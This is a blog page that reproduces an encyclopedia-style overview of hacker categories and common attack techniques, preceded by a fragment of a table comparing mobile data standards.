| UMTS W-CDMA HSDPA+HSUPA HSPA+ | UMTS/3GSM | General 3G | CDMA/FDD CDMA/FDD/MIMO | 0.384 14.4 56 | 0.384 5.76 22 | HSDPA widely deployed. Typical downlink rates today 2 Mbit/s, ~200 kbit/s uplink; HSPA+ downlink up to 56 Mbit/s. |
| UMTS-TDD | UMTS/3GSM | Mobile Internet | CDMA/TDD | 16 | Reported speeds according toIPWireless using 16QAM modulation similar to HSDPA+HSUPA | |
| 1xRTT | CDMA2000 | Mobile phone | CDMA | 0.144 | Succeeded by EV-DO for data use, but still is used for voice and as a failover for EV-DO | |
| EV-DO 1x Rev. 0 EV-DO 1x Rev.A EV-DO Rev.B | CDMA2000 | Mobile Internet | CDMA/FDD | 2.45 3.1 4.9xN | 0.15 1.8 1.8xN | Rev B note: N is the number of 1.25 MHz chunks of spectrum used. EV-DO is not designed for voice, and requires a fallback to 1xRTT when a voice call is placed or received. |
Posted on 06:52 by Unknown
A hacker is a person who breaks into computers and computer networks for profit, as protest, or sometimes by the motivation of the challenge. The subculture that has evolved around hackers is often referred to as the computer underground but is now an open community.
Other definitions of the word hacker exist that are not related to computer security. They are subject to the long standing hacker definition controversy about the true meaning of hacker. In this controversy, the term hacker is reclaimed by computer programmers who argue that someone breaking into computers is better called cracker, not making a difference between computer criminals ("black hats") and computer security experts ("white hats"). Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called crackers.
Hacker attitudes
Several subgroups of the computer underground with different attitudes and aims use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree. Eric S. Raymond (author of The New Hacker's Dictionary) advocates that members of the computer underground should be called crackers. Yet, those people see themselves as hackers and even try to include the views of Raymond in what they see as one wider hacker culture, a view harshly rejected by Raymond himself. Instead of a hacker/cracker dichotomy, they give more emphasis to a spectrum of different categories, such as white hat, grey hat,black hat and script kiddie. In contrast to Raymond, they usually reserve the term cracker. According to (Clifford R.D. 2006) a cracker or cracking is to "gain unauthorized access to a computer in order to commit another crime such as destroying information contained in that system".These subgroups may also be defined by the legal status of their activities.
- White hat
- A white hat hacker breaks security for non-malicious reasons, for instance testing their own security system. This classification also includes individuals who perform penetration tests and vulnerability assessments within a contractual agreement. Often, this type of 'white hat' hacker is called an ethical hacker. The International Council of Electronic Commerce Consultants, also known as the EC-Council has developed certifications, courseware, classes, and online training covering the diverse arena of Ethical Hacking.
- Black hat
- A Black Hat Hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain"(Moore,2005). Black Hat Hackers are "the epitome of all that the public fears in a computer criminal"(Moore,2006). Black Hat Hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network.
The way Black Hat Hackers choose the networks that they are going to break into is by a process that can be broken down into two parts. This is called the pre-hacking stage.
Part 1 Targeting Targeting is when the hacker determines what network to break into. The target may be of particular interest to the hacker, or the hacker may "Port Scan" a network to determine if it is vulnerable to attacks. A port is defined as "an opening through which the computer receives data via the network"(Moore,2005). Open ports will allow a hacker to access the system.
Part 2 Research and Information Gathering It is in this stage that the hacker will visit or contact the target in some way in hopes of finding out vital information that will help them access the system. The main way that hackers get desired results from this stage is from Social Engineering, which will be explained below. Aside from Social Engineering hackers can also use a technique called Dumpster Diving. Dumpster Diving is when a hacker will literally dive into a dumpster in hopes to find documents that users have thrown away, which will help them gain access to a network.
- Grey hat
- A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
- Elite hacker
- A social status among hackers, elite is used to describe the most skilled. Newly discovered exploits will circulate among these hackers. Elite groups such as Masters of Deception conferred a kind of credibility on their members.:86,90,117 Elite (e.g. 31337) gives the term leet speak its name.
- Script kiddie
- A script kiddie is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept—hence the term script (i.e. a prearranged plan or set of activities) kiddie (i.e. kid, child—an individual lacking knowledge and experience, immature).
- Neophyte
- A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.
- Blue hat
- A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
- Hacktivist
- A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, mosthacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as tool forcyberterrorism.
Attacks
A typical approach in an attack on Internet-connected system is:
- Network enumeration: Discovering information about the intended target.
- Vulnerability analysis: Identifying potential ways of attack.
- Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.
In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.
Techniques
- Vulnerability scanner
- A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses. Hackers also commonly use port scanners. These check to see which ports on a specified computer are "open" or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Note that firewalls defend computers from intruders by limiting access to ports/machines both inbound and outbound, but can still be circumvented.)
- Password cracking
- Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.
- Packet sniffer
- A packet sniffer is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.
- Spoofing attack (Phishing)
- A spoofing attack involves one program, system, or website successfully masquerading as another by falsifying data and thereby being treated as a trusted system by a user or another program. The purpose of this is usually to fool programs, systems, or users into revealing confidential information, such as user names and passwords, to the attacker.
- Rootkit
- A rootkit is designed to conceal the compromise of a computer's security, and can represent any of a set of programs which work to subvert control of an operating system from its legitimate operators. Usually, a rootkit will obscure its installation and attempt to prevent its removal through a subversion of standard system security. Rootkits may include replacements for system binaries so that it becomes impossible for the legitimate user to detect the presence of the intruder on the system by looking at process tables.
- Social engineering
- Social engineering When a Hacker, typically a black hat, is in the second stage of the targeting process, he or she will typically use some social engineering tactics to get enough information to access the network. A common practice for hackers who use this technique, is to contact the system administrator and play the role of a user who cannot get access to his or her system. Hackers who use this technique have to be quite savvy and choose the words they use carefully, in order to trick the system administrator into giving them information. In some cases only an employed help desk user will answer the phone and they are generally easy to trick. Another typical hacker approach is for the hacker to act like a very angry supervisor and when the his/her authority is questioned they will threaten the help desk user with their job. Social Engineering is so effective because users are the most vulnerable part of an organization. All the security devices and programs in the world wont keep an organization safe if an employee gives away a password. Black Hat Hackers take advantage of this fact. Social Engineering can also be broken down into four sub-groups. These are intimidation, helpfulness, technical, and name-dropping.
- Trojan horses
- A Trojan horse is a program which seems to be doing one thing, but is actually doing another. A trojan horse can be used to set up a back door in a computer system such that the intruder can gain access later. (The name refers to the horse from the Trojan War, with conceptually similar function of deceiving defenders into bringing an intruder inside.)
- Viruses
- A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Therefore, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells.
- While some are harmless or mere hoaxes most computer viruses are considered malicious.
- Worms
- Like a virus, a worm is also a self-replicating program. A worm differs from a virus in that it propagates through computer networks without user intervention. Unlike a virus, it does not need to attach itself to an existing program. Many people conflate the terms "virus" and "worm", using them both to describe any self-propagating program.
- Key loggers
- A key logger is a tool designed to record ('log') every keystroke on an affected machine for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed on the affected machine, such as a user's password or other private data. Some key loggers uses virus-, trojan-, and rootkit-like methods to remain active and hidden. However, some key loggers are used in legitimate ways and sometimes to even enhance computer security. As an example, a business might have a key logger on a computer used at a point of sale and data collected by the key logger could be used for catching employee fraud.
Posted on 06:48 by Unknown
Subscribe to:
Posts (Atom)
Popular Posts
-
All of u know about the history of india so pls visit this link and know about the indian history -
some of our great Indian leaders list . visit this link and know about them ............ -
Education Today | The Graceful Dawn